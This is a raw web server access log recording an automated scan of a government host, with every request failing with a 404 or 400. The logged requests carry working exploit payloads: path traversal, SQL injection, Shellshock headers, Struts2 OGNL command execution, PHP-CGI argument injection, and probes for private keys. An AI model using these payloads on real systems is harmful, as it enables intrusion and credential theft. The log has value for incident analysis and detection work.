103.153.214.94 GET /vpn/user/download/client ostype=../../../../../../../../../etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15-620 - 404 7 0 218 2024-12-12 04:35:55 103.153.214.94 GET /upgrade/detail.jsp/login/LoginSSO.jsp id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh,+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 216 2024-12-12 04:35:56 103.153.214.94 POST /6qfiAcPoi1rJ.jsp error=bsh.Interpreter 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 226 2024-12-12 04:35:56 103.153.214.94 GET /users/sign_in - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_12)+AppleWebKit/618.17.9+(KHTML,+like+Gecko)+Version/17.4+Safari/618.17.9 - 404 7 0 201 2024-12-12 04:35:56 103.153.214.94 POST /cgi-bin/rpc - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/617.2.4+(KHTML,+like+Gecko)+Version/17.3+Safari/617.2.4 - 404 7 0 210 2024-12-12 04:35:59 103.153.214.94 POST /index.php s=/home/page/uploadImg 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.0+Safari/605.1.15 - 404 7 0 226 2024-12-12 04:36:06 103.153.214.94 POST /seeyon/htmlofficeservlet - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 233 2024-12-12 04:36:09 103.153.214.94 GET /seeyon/test123456.jsp pwd=asasd3344&2q6JQeo0xtbMiI2XMrBUlV1NHIL=ipconfig 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 203 2024-12-12 04:36:09 103.153.214.94 POST /general/index/UploadFile.php m=uploadPicture&uploadType=eoffice_logo&userId 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 210 2024-12-12 04:36:11 103.153.214.94 GET /images/logo/logo-eoffice.php - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 200 2024-12-12 04:36:40 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 199 2024-12-12 04:36:42 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.81+Safari/537.36 - 404 7 0 233 2024-12-12 04:39:15 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 208 2024-12-12 04:39:17 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/78.0.3904.108+Safari/537.36 - 404 7 0 208 2024-12-12 04:39:25 103.153.214.94 POST /public/index.php/material/Material/_download_imgage media_id=1&picUrl=./../config/database.php 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 217 2024-12-12 04:39:27 103.153.214.94 GET /public/index.php/home/file/user_pics - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 206 2024-12-12 04:39:31 103.153.214.94 POST /boardDataWW.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.6.16 - 404 7 0 37 2024-12-12 04:40:32 103.153.214.94 POST /cps/test_backup_server ACTION=TEST_IP&NOCONTINUE=TRUE 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 35 2024-12-12 04:44:05 103.153.214.94 GET / lang=../../../../../usr/local/php/pearcmd 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 225 2024-12-12 04:44:07 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 225 2024-12-12 04:44:09 103.153.214.94 GET / +config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+0suEuk2Fcj.log 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 226 2024-12-12 04:50:46 103.153.214.94 POST /scripts/setup.php - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 04:53:13 103.153.214.94 POST /api/session - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.61+Safari/537.36 - 404 7 0 43 2024-12-12 04:53:35 103.153.214.94 GET /miscadmin - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 40 2024-12-12 04:53:35 103.153.214.94 GET /miscadmin - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 39 2024-12-12 04:53:35 103.153.214.94 GET /miscadmin - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+U;+Linux+i686;+pt-BR;+rv:1.9.0.3)+Gecko/2008092510+Ubuntu/8.04+(hardy)+Firefox/3.0.3 - 404 7 0 58 2024-12-12 04:53:35 103.153.214.94 GET /mcmadmin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 39 2024-12-12 04:53:35 103.153.214.94 GET /miscadmin - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 04:53:35 103.153.214.94 GET /miscadmin - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 37 2024-12-12 04:53:35 103.153.214.94 GET /miscadmin - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 44 2024-12-12 04:53:35 103.153.214.94 GET /miscadmin - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 55 2024-12-12 04:53:35 103.153.214.94 GET /miscadmin - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 61 2024-12-12 04:54:59 103.153.214.94 POST /cgi-bin/webproc - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.135+Safari/537.36+Edge/12.10240 - 404 7 0 62 2024-12-12 04:56:19 103.153.214.94 POST /api/v1/users/signup - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 42 2024-12-12 04:56:21 103.153.214.94 GET /api/presets/ filter=true 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=staging&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 66 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=devel&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 55 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=spx&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.45 - 404 7 0 54 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=production&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 51 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=prod&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.52 - 404 7 0 50 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=dev&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.7+Safari/537.36 - 404 7 0 50 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=prd&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_1_4;+en-US)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 48 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=stg&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 48 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=test&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=stag&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:101.0)+Gecko/20100101+Firefox/101.0 - 404 7 0 101 2024-12-12 04:57:28 103.153.214.94 GET / SPX_KEY=testing&SPX_UI_URI=/ 8172 - 206.238.196.225 Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9.2.6)+Gecko/20100628+Ubuntu/10.04+(lucid)+Firefox/3.6.6 - 404 7 0 102 2024-12-12 05:02:29 103.153.214.94 POST /webadmin/auth/verification.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 https://bcvt.kontum.gov.vn:8172/webadmin/start/ 404 7 0 208 2024-12-12 05:02:29 103.153.214.94 POST /cgibin/webproc - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 210 2024-12-12 05:02:49 103.153.214.94 POST / q=node&destination=node 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 05:02:57 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 05:02:57 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/110.0 - 404 7 0 205 2024-12-12 05:02:57 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 228 2024-12-12 05:04:02 103.153.214.94 POST / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.5.20 - 404 7 0 212 2024-12-12 05:05:20 103.153.214.94 POST /wp-content/plugins/wsecure/wsecure-config.php - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 229 2024-12-12 05:05:24 103.153.214.94 POST /axis2-admin/login - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 209 2024-12-12 05:05:24 103.153.214.94 POST /axis2/axis2-admin/login - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 230 2024-12-12 05:05:26 103.153.214.94 POST /webadm/ q=moni_detail.do&action=gragh 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 213 2024-12-12 05:05:36 103.153.214.94 POST /index.php -d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 223 2024-12-12 05:06:45 103.153.214.94 GET /wp-admin/admin-ajax.php action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/107.0.0.0+Safari/537.36 - 404 7 0 211 2024-12-12 05:07:03 103.153.214.94 POST /user.action - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 05:09:01 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.19 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 199 2024-12-12 05:09:01 103.153.214.94 GET /cgi-bin/status - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 196 2024-12-12 05:09:01 103.153.214.94 GET /cgi-bin/test - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.82+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 201 2024-12-12 05:09:01 103.153.214.94 GET /debug.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0)+Gecko/20100101+Firefox/128.0 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 204 2024-12-12 05:09:01 103.153.214.94 GET /cgi-bin/test-cgi - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 223 2024-12-12 05:09:01 103.153.214.94 GET /test.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.1+Mobile/15E148+Safari/604.1 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 222 2024-12-12 05:09:01 103.153.214.94 GET /cgi-bin/stats - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 221 2024-12-12 05:09:01 103.153.214.94 GET /cgi-bin/status/status.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.18 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 208 2024-12-12 05:09:01 103.153.214.94 GET /cgi-bin/test.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 404 7 0 222 2024-12-12 05:09:02 103.153.214.94 GET /index.action redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.27 - 404 7 0 196 2024-12-12 05:09:02 103.153.214.94 GET /login.action action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 05:09:02 103.153.214.94 GET /login.action redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.2+Safari/605.1.15 - 404 7 0 200 2024-12-12 05:09:02 103.153.214.94 GET /index.action redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.18 - 404 7 0 200 2024-12-12 05:09:02 103.153.214.94 GET /index.action action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Teak/4.3.1+Version/17.4.1+Safari/605.1.15 - 404 7 0 219 2024-12-12 05:09:02 103.153.214.94 GET /index.action action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.0.3396.99+Safari/537.36 - 404 7 0 218 2024-12-12 05:09:02 103.153.214.94 GET /index.action redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5+Safari/605.1.15 - 404 7 0 218 2024-12-12 05:09:02 103.153.214.94 GET /index.action redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.124+Safari/537.36 - 404 7 0 224 2024-12-12 05:09:02 103.153.214.94 GET /login.action redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 227 2024-12-12 05:11:00 103.153.214.94 GET /.ssh/id_rsa_2048 - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/22.0.0+Version/17.3.1+Safari/605.1.15 - 404 7 0 58 2024-12-12 05:11:00 103.153.214.94 GET /bcvt.kontum.gov.vn:8172.pem - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 400 0 0 59 2024-12-12 05:11:00 103.153.214.94 GET /.ssh/id_rsa_3072 - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 34 2024-12-12 05:11:00 103.153.214.94 GET /id_rsa_4096 - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/113.0 - 404 7 0 32 2024-12-12 05:11:00 103.153.214.94 GET /id_dsa - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 05:11:00 103.153.214.94 GET /id_rsa_3072 - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.3.26 - 404 7 0 33 2024-12-12 05:11:00 103.153.214.94 GET /id_rsa_1024 - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 32 2024-12-12 05:11:00 103.153.214.94 GET /www.key - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18363 - 404 7 0 32 2024-12-12 05:11:00 103.153.214.94 GET /ssl/bcvt.kontum.gov.vn:8172.key - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.52 - 400 0 0 32 2024-12-12 05:11:00 103.153.214.94 GET /privatekey.key - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 32 2024-12-12 05:11:00 103.153.214.94 GET /my.key - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 40 2024-12-12 05:11:00 103.153.214.94 GET /localhost.key - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 49 